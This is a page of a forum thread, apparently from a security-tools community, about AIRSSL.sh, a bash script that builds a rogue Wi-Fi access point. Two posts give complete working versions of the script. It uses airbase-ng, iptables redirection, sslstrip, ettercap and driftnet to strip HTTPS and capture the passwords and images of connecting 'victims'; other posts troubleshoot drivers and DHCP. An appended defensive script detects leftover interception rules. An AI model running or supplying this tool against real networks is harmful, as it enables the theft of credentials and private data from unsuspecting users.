Page 5 of 9 FirstFirst ... 34567 ... LastLast
Results 41 to 50 of 88

Thread: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

  1. #41
    Senior Member
    Join Date
    Jul 2009
    Posts
    135

    Default Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

To all who may still be encountering permission issues with the DHCP portion of the script, the following fix should take care of this (it did for me).

    touch /var/run/dhcpd.pid
    chown dhcpd:dhcpd /var/run/dhcpd.pid


    Enter these two commands in the script just before the code that starts dhcpd server.

    Read More here at my blog.

  2. #42
    Just burned his ISO
    Join Date
    Sep 2010
    Posts
    5

    Default Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

Just wanted to say thanks for the script and help on IRC, killa. Your hint led me to a bunch of possible solutions. One of which is taken straight from the ettercap man page. DOH!

    "BRIDGED, it uses two network interfaces and forward the traffic from one to the other while performing sniffing and content filtering. This sniffing method is totally stealthy since there is no way to find that someone is in the middle on the cable. You can look at this method as a mitm attack at layer 1. You will be in the middle of the cable between two entities. Don’t use it on gateways or it will transform your gateway into a bridge. HINT: you can use the content filtering engine to drop packets that should not pass. This way ettercap will work as an inline IPS "

    Haven't tried it yet, but it's a start in the right direction after being at a stalemate for days. Again, many thanks.

  3. #43
    Just burned his ISO
    Join Date
    Jun 2010
    Posts
    4

    Default Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

I have a question in regards to POST #31. I've read several posts where there were reported issues with the r8187 driver, but I was wondering if anyone else encountered a similar situation.

    Whenever I run airbase-ng using the r8187 driver (AWUS036H) it doesn't send out any beacons. Does anyone have an alternate solution? Previously, I have used RTL8187 driver with the AWUS036H but dhcpd is incredibly slow.


    - UPDATE
To elaborate more about my situation, I have a 500 mW AWUS036H (older) and a 1000 mW AWUS036H (newer) Alfa card, both of which are using the r8187 driver. Initially, "iwconfig" will recognize each card at 5 dBm. At this setting, I am able to see the beacons sent by airbase-ng. But after following POST #31, more specifically the part about adjusting the transmit power, I am unable to see the beacons being broadcast by airbase-ng. I used the commands "iwpriv wlan1 highpower 1" and "iwconfig wlan1 txpower 27". Only when I adjust the txpower to its fullest capacity (whether it is 27 dBm/500 mW or 30 dBm/1000 mW) does airbase-ng stop sending beacons.

    Has anyone encountered this issue or have a recommendation?
    Last edited by xsv10; 09-08-2010 at 05:35 PM.

  4. #44
    Just burned his ISO
    Join Date
    Sep 2010
    Posts
    7

    Default Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

Thanks for a great script and great thread.

I got this setup working on my VM of BT4 R1 using both a WUSB54G v4 and an AWUS050NH.

The only issue I've had so far is that the AWUS050NH isn't very stable and will disappear as an AP after a short while, but this is probably my card's fault as it is in pretty bad shape.

I do, however, have one question: the first couple of times I tried to log on to Gmail with a PC connected to the fake AP I only got to a page saying something like "please enable cookies in your browser". Has anyone else experienced something similar?

It is by no means a big issue though, as this issue "resolved itself" after waiting a couple of minutes and trying again.

  5. #45
    Just burned his ISO
    Join Date
    Oct 2010
    Posts
    2

    Default Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

I cannot connect to the internet using r8187.

    I also get "Can't create PID file ...: Permission denied" using both drivers.

  6. #46
    Just burned his ISO
    Join Date
    Feb 2008
    Posts
    11

    Default Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

All works all right, but when I try to connect to the internet through Firefox it does not browse anything. I think it's a DNS problem. Is it possible?

  7. #47
    Just burned his ISO
    Join Date
    Feb 2008
    Posts
    11

    Default Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

I have got it to work with some little modifications (merging this with a tutorial I found), also removing the 2 commented lines in etter.conf. Probably the "not browsing issue" was a missing route add line. Here is the code if someone needs it. I have tested it with r8187 (very bad performance) and rt73usb (a WUSB54GC, with very good results instead):
    Code:
    #!/bin/bash
    # (C)opyright 2009 - killadaninja
    # airssl.sh - v1.0
    # visit the man page NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh
    # Dhcpd creation
    mkdir -p "/pentest/wireless/airssl"
    echo "ddns-update-style ad-hoc;
    default-lease-time 600;
    max-lease-time 7200;
    authoritative;
    subnet 192.168.5.128 netmask 255.255.255.128 {
    option subnet-mask 255.255.255.128;
    option broadcast-address 192.168.5.255;
    option routers 192.168.5.129;
    option domain-name-servers 8.8.8.8;
    range 192.168.5.130 192.168.5.140;
    
    }" > /pentest/wireless/airssl/dhcpd.conf
    
    # Network question
    echo
    echo "AIRSSL 1.0 - killadaninja  "
    echo
    echo -n "Enter the networks gateway or DNS IP address, for example 192.168.1.254: "
    read -e gatewayip
    echo -n "Enter your interface thats connected to the internet, for example wlan0: "
    read -e internet_interface
    echo -n "Enter your interface to be used for the fake AP, for example wlan1: "
    read -e fakeap_interface
    echo -n "Enter the ESSID you would like your rogue AP to be called, for example Free WiFi: "
    read -e ESSID
    
    # Fake ap setup
    echo "[+] Configuring FakeAP...."
    echo
    echo "Airbase-ng will run in its most basic mode, would you like to
    configure any extra switches, choose n if your are unsure... y or n "
    read ANSWER
    
    if [ $ANSWER = "y" ] ; then
    airbase-ng --help
    fi
    
    if [ $ANSWER = "y" ] ; then
    echo
    echo -n "Enter switches, note you have already chosen an ESSID -e this cannot be 
    redefined, also in this mode you MUST define a channel "
    read -e aswitch
    echo
    echo "[+] Starting FakeAP..."
    xterm -geometry 75x15+1+0 -T FakeAP -e airbase-ng "$aswitch" -e "$ESSID" $fakeap_interface &
    sleep 2
    fi
    
    if [ $ANSWER = "n" ] ; then
    echo
    echo "[+] Starting FakeAP..."
    xterm -geometry 75x15+1+0 -T FakeAP -e airbase-ng -c 1 -e "$ESSID" $fakeap_interface &
    sleep 2
    fi
    
    # Tables
    echo "[+] Configuring forwarding tables..."
    ifconfig lo up
    ifconfig at0 up &
    sleep 1
    ifconfig at0 192.168.5.129 netmask 255.255.255.128
    ifconfig at0 mtu 1400
    route add -net 192.168.5.128 netmask 255.255.255.128 gw 192.168.5.129
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    iptables --table nat --append POSTROUTING --out-interface $internet_interface -j MASQUERADE
    iptables --append FORWARD --in-interface at0 -j ACCEPT
    iptables -t nat -A PREROUTING -p udp -j DNAT --to $gatewayip
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
    #iptables -t nat -A POSTROUTING -o at0 -j MASQUERADE
    
    # DHCP
    mkdir -p /var/run/dhcpd && chown dhcpd:dhcpd /var/run/dhcpd
    echo > '/var/lib/dhcp3/dhcpd.leases'
    echo "[+] Setting up DHCP..."
    xterm -geometry 75x20+1+100 -T DHCP -e dhcpd3 -d -f -cf "/pentest/wireless/airssl/dhcpd.conf" -pf /var/run/dhcpd/dhcpd.pid at0 &
    sleep 3
    
    # Sslstrip
    echo 1 > /proc/sys/net/ipv4/ip_forward
    echo "[+] Starting sslstrip..."
    xterm -geometry 75x15+1+200 -T sslstrip -e sslstrip -f -a -k &
    sleep 2
    
    # Ettercap
    echo "[+] Configuring ettercap..."
    echo
    echo "Ettercap will run in its most basic mode(remember to remove # from etter.conf), would you like to
    configure any extra switches for example to load plugins or filters,
    (advanced users only), if you are unsure choose n, y or n "
    read ETTER
    if [ $ETTER = "y" ] ; then
    ettercap --help
    fi
    
    if [ $ETTER = "y" ] ; then
    echo -n "Interface type is set you CANNOT use "\"interface type\"" switches here
    For the sake of airssl, ettercap WILL USE -u and -p so you are advised
    NOT to use -M, also -i is already set and CANNOT be redifined here. 
    Ettercaps output will be saved to /pentest/wireless/airssl/passwords
    DO NOT use the -w switch, also if you enter no switches here ettercap will fail "
    echo
    read "eswitch"
    echo "[+] Starting ettercap..."
    xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u "$eswitch" -T -q -i at0 &
    sleep 1
    fi
    
    if [ $ETTER = "n" ] ; then
    echo
    echo "[+] Starting ettercap..."
    xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u -T -q -w /pentest/wireless/airssl/passwords -i at0 &
    sleep 1
    fi
    
    # Driftnet
    echo
    echo "[+] Driftnet?"
    echo
    echo "Would you also like to start driftnet to capture the victims images,
    (this may make the network a little slower), y or n "
    read DRIFT
    
    if [ $DRIFT = "y" ] ; then
    mkdir -p "/pentest/wireless/airssl/driftnetdata"
    echo "[+] Starting driftnet..."
    driftnet -i $internet_interface -p -d /pentest/wireless/airssl/driftnetdata &
    sleep 3
    fi
    
    clear
    echo
    echo "[+] Activated..."
    echo "Airssl is now running, after victim connects and surfs, their credentials 
    will be displayed in ettercap. You may use right/left mouse buttons 
    to scroll up/down ettercaps xterm shell, ettercap will also save its output 
    to /pentest/wireless/airssl/passwords unless you stated otherwise. 
    Driftnet images will be saved to /pentest/wireless/airssl/driftftnetdata "
    echo
    echo "[+] IMPORTANT..."
    echo "After you have finished please close airssl and clean up properly by hitting y,
    if airssl is not closed properly ERRORS WILL OCCUR "
    read WISH
    
    # Clean up
    if [ $WISH = "y" ] ; then
    echo
    echo "[+] Cleaning up airssl and resetting iptables..."
    killall xterm
    killall driftnet
    echo "0" > /proc/sys/net/ipv4/ip_forward
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    
    echo "[+] Clean up successful..."
    echo "[+] Thank you for using airssl, Good Bye..."
    exit
    
    fi
    exit

  8. #48
    Just burned his ISO
    Join Date
    Nov 2010
    Posts
    4

    Default Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

    Hope someone can help,

The script runs fine (eth0 for my internet connection & wlan0 (rt73usb) for the fake AP creation).

I can see the fake AP, but the client doesn't seem to get an IP from the DHCP?

Also tried to use mon0 to create the fake AP & same result.

I am using BT4R1 on VMware with RT73USB (Edimax).

    SCREENSHOT

  9. #49
    Very good friend of the forum killadaninja's Avatar
    Join Date
    Oct 2007
    Location
    London, United Kingdom.
    Posts
    526

    Default Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

    Quote Originally Posted by nlflux View Post
    Hope someone can help,

    The script runs fine (eth0 for my internet connection & wlan0 (rt73usb) for the fake ap creation)

    I can see the fake AP but on the client it doesn't seem to get an IP from the dhcp?

    Also tried to use mon0 to create the fake ap & same result

    I am using BT4R1 on VMware with RT73USB (edimax )

    SCREENSHOT
Would it be possible to try connecting BT directly to your network (non-NATed), or to check the other networking options inside the VM?
    Last edited by killadaninja; 02-10-2011 at 07:00 PM.
    Sometimes I try to fit a 16-character string into an 8–byte space, on purpose.

  10. #50
    Just burned his ISO
    Join Date
    Nov 2010
    Posts
    3

    Default Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

I hope you don't mind, but I made a few additions to your script for a demonstration I needed to run at work.

I have added/changed the following:
• Shows routing table with gateway IP & interface at startup
• Made the DHCP hostname match the chosen SSID (doesn't work in ALL mode)
• Added an ALL (a) mode to the FakeAP settings prompt (instead of using the fixed SSID it clones ALL incoming probe requests)
• Fixed the DHCP PID permissions issue as discussed in this thread
• Added interface and monitor names to the Fake AP xterm window title
• Changed sslstrip to only log SSL POST data instead of all SSL data, as all the data is logged by ettercap anyway
• Added an sslstrip log window showing just SSL POST data (much cleaner than watching ettercap output for USER:PASS details)
• Improved the cleanup routine: replaced 'killall' with 'kill ${PROCESSid}' calls


Here is my updated code in case you're interested:

    Code:
    #!/bin/bash
    # (C)opyright 2009 - killadaninja - Modified G60Jon 2010
    # airssl.sh - v1.0
    # visit the man page NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh
    
    # Network questions
    echo
    echo "Fake AP - SSL Strip"
    echo
    route -n -A inet | grep UG
    echo
    echo
    echo "Enter the networks gateway IP address, this should be listed above. For example 192.168.1.254: "
    read -e gatewayip
    echo -n "Enter your interface thats connected to the internet, this should be listed above. For example wlan0: "
    read -e internet_interface
    echo -n "Enter your interface to be used for the fake AP, for example wlan1: "
    read -e fakeap_interface
    echo -n "Enter the ESSID you would like your rogue AP to be called: "
    read -e ESSID
    airmon-ng start $fakeap_interface
    fakeap=$fakeap_interface
    fakeap_interface="mon0"
    
    # Dhcpd creation
    mkdir -p "/pentest/wireless/airssl"
    echo "authoritative;
    
    default-lease-time 600;
    max-lease-time 7200;
    
    subnet 10.0.0.0 netmask 255.255.255.0 {
    option routers 10.0.0.1;
    option subnet-mask 255.255.255.0;
    
    option domain-name "\"$ESSID\"";
    option domain-name-servers 10.0.0.1;
    
    range 10.0.0.20 10.0.0.50;
    
    }" > /pentest/wireless/airssl/dhcpd.conf
    
    # Fake ap setup
    echo "[+] Configuring FakeAP...."
    echo
    echo "Airbase-ng will run in its most basic mode, would you like to
    configure any extra switches, would you like Airbase to clone ALL probe requests
    choose n if your are unsure... Y or N or All? "
    read ANSWER
    
    if [ $ANSWER = "y" ] ; then
    airbase-ng --help
    fi
    
    if [ $ANSWER = "y" ] ; then
    echo
    echo -n "Enter switches, note you have already chosen an ESSID -e this cannot be 
    redefined, also in this mode you MUST define a channel "
    read -e aswitch
    echo
    echo "[+] Starting FakeAP..."
    xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng "$aswitch" -e "$ESSID" $fakeap_interface & fakeapid=$!
    sleep 2
    fi
    
    if [ $ANSWER = "a" ] ; then
    echo
    echo "[+] Starting FakeAP..."
    xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -P -C 30 $fakeap_interface & fakeapid=$!
    sleep 2
    fi
    
    
    if [ $ANSWER = "n" ] ; then
    echo
    echo "[+] Starting FakeAP..."
    xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -c 1 -e "$ESSID" $fakeap_interface & fakeapid=$!
    sleep 2
    fi
    
    # Tables
    echo "[+] Configuring forwarding tables..."
    ifconfig lo up
    ifconfig at0 up &
    sleep 1
    ifconfig at0 10.0.0.1 netmask 255.255.255.0
    ifconfig at0 mtu 1400
    route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    echo 1 > /proc/sys/net/ipv4/ip_forward
    iptables -t nat -A PREROUTING -p udp -j DNAT --to $gatewayip
    iptables -P FORWARD ACCEPT
    iptables --append FORWARD --in-interface at0 -j ACCEPT
    iptables --table nat --append POSTROUTING --out-interface $internet_interface -j MASQUERADE
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
    
    # DHCP
    echo "[+] Setting up DHCP..."
    touch /var/run/dhcpd.pid
    chown dhcpd:dhcpd /var/run/dhcpd.pid
    xterm -geometry 75x20+1+100 -T DHCP -e dhcpd3 -d -f -cf "/pentest/wireless/airssl/dhcpd.conf" at0 & dchpid=$!
    sleep 3
    
    # Sslstrip
    echo "[+] Starting sslstrip..."
    xterm -geometry 75x15+1+200 -T sslstrip -e sslstrip -f -p -k 10000 & sslstripid=$!
    sleep 2
    
    # Ettercap
    echo "[+] Configuring ettercap..."
    echo
    echo "Ettercap will run in its most basic mode, would you like to
    configure any extra switches for example to load plugins or filters,
    (advanced users only), if you are unsure choose n, y or n "
    read ETTER
    if [ $ETTER = "y" ] ; then
    ettercap --help
    fi
    
    if [ $ETTER = "y" ] ; then
    echo -n "Interface type is set you CANNOT use "\"interface type\"" switches here
    For the sake of airssl, ettercap WILL USE -u and -p so you are advised
    NOT to use -M, also -i is already set and CANNOT be redifined here. 
    Ettercaps output will be saved to /pentest/wireless/airssl/passwords
    DO NOT use the -w switch, also if you enter no switches here ettercap will fail "
    echo
    read "eswitch"
    echo "[+] Starting ettercap..."
    xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u "$eswitch" -T -q -i at0 & ettercapid=$!
    sleep 1
    fi
    
    if [ $ETTER = "n" ] ; then
    echo
    echo "[+] Starting ettercap..."
    xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u -T -q -w /pentest/wireless/airssl/passwords -i at0 & ettercapid=$!
    sleep 1
    fi
    
    # Driftnet
    echo
    echo "[+] Driftnet?"
    echo
    echo "Would you also like to start driftnet to capture the victims images,
    (this may make the network a little slower), y or n "
    read DRIFT
    
    if [ $DRIFT = "y" ] ; then
    mkdir -p "/pentest/wireless/airssl/driftnetdata"
    echo "[+] Starting driftnet..."
    driftnet -i $internet_interface -p -d /pentest/wireless/airssl/driftnetdata & dritnetid=$!
    sleep 3
    fi
    
    xterm -geometry 75x15+1+600 -T SSLStrip-Log -e tail -f sslstrip.log & sslstriplogid=$!
    
    clear
    echo
    echo "[+] Activated..."
    echo "Airssl is now running, after victim connects and surfs their credentials 
    will be displayed in ettercap. You may use right/left mouse buttons 
    to scroll up/down ettercaps xterm shell, ettercap will also save its output 
    to /pentest/wireless/airssl/passwords unless you stated otherwise. 
    Driftnet images will be saved to /pentest/wireless/airssl/driftftnetdata "
    echo
    echo "[+] IMPORTANT..."
    echo "After you have finished please close airssl and clean up properly by hitting y,
    if airssl is not closed properly ERRORS WILL OCCUR "
    read WISH
    
    # Clean up
    if [ $WISH = "y" ] ; then
    echo
    echo "[+] Cleaning up airssl and resetting iptables..."
    
    kill ${fakeapid}
    kill ${dchpid}
    kill ${sslstripid}
    kill ${ettercapid}
    kill ${dritnetid}
    kill ${sslstriplogid}
    
    airmon-ng stop $fakeap_interface
    airmon-ng stop $fakeap
    echo "0" > /proc/sys/net/ipv4/ip_forward
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    
    echo "[+] Clean up successful..."
    echo "[+] Thank you for using airssl, Good Bye..."
    exit
    
    fi
    exit
Thank you again for making it available in the 1st place and I hope you find my changes useful.

    Regards
    J
Last edited by g60jon; 11-14-2010 at 11:15 AM. Reason: Updated code to include improved cleanup
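Both cleanup routines in this thread (the killall/flush sequence in #47 and the kill-by-PID version in #50) warn that an unclean exit leaves the NAT rules behind. As an added example, not code from the thread or from airssl.sh, here is a small POSIX shell audit that reads iptables-save output and flags the three rule patterns the "Tables" block installs (tcp/80 REDIRECT to a local port, blanket UDP DNAT, POSTROUTING MASQUERADE), so a lab host can be checked for leftover interception state before it goes back on a shared network. The sample rulesets are constructed; the function name and the --live/--demo switches are this example's own.

```shell
#!/bin/sh
# audit_nat.sh - added example, not part of airssl.sh or the thread.
# Scans iptables-save text for the interception rules airssl.sh installs
# so leftover state from an unclean exit can be spotted and flushed.

# audit_nat_rules TEXT: prints one "[!]" line per interception rule found.
# Returns 0 when the ruleset is clean, 1 when anything was flagged.
audit_nat_rules() {
    rules="$1"
    found=0
    # Port-80 REDIRECT to a local port: the hook that feeds sslstrip.
    if printf '%s\n' "$rules" | grep -Eq -e '-A PREROUTING .*-p tcp .*--dport 80 .*-j REDIRECT'; then
        echo "[!] tcp/80 is REDIRECTed to a local port (sslstrip-style hook)"
        found=$((found + 1))
    fi
    # Blanket UDP DNAT: every UDP flow (DNS included) is rewritten to one host.
    if printf '%s\n' "$rules" | grep -Eq -e '-A PREROUTING -p udp .*-j DNAT'; then
        echo "[!] all UDP is DNATed to a single address"
        found=$((found + 1))
    fi
    # MASQUERADE on POSTROUTING: this host is forwarding for other clients.
    if printf '%s\n' "$rules" | grep -Eq -e '-A POSTROUTING .*-j MASQUERADE'; then
        echo "[!] POSTROUTING MASQUERADE present (host is acting as a NAT gateway)"
        found=$((found + 1))
    fi
    [ "$found" -eq 0 ]
}

# Constructed sample: what iptables-save shows after the "Tables" block ran
# and the cleanup section never did.
SAMPLE_DIRTY='*nat
:PREROUTING ACCEPT [0:0]
:POSTROUTING ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
-A PREROUTING -p udp -j DNAT --to-destination 192.168.1.254
-A PREROUTING -p tcp -m tcp --dport 80 -j REDIRECT --to-ports 10000
-A POSTROUTING -o eth0 -j MASQUERADE
COMMIT'

# Constructed sample: an ordinary host with an empty nat table.
SAMPLE_CLEAN='*nat
:PREROUTING ACCEPT [0:0]
:POSTROUTING ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
COMMIT'

# --live audits the running ruleset (needs root); --demo audits the sample.
case "${1:-}" in
    --live) audit_nat_rules "$(iptables-save 2>/dev/null)" ;;
    --demo) audit_nat_rules "$SAMPLE_DIRTY" ;;
esac
```

A non-zero exit from `--live` means the nat table should be flushed (the same four iptables lines the script's cleanup section uses) before the host is trusted on a shared network again.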
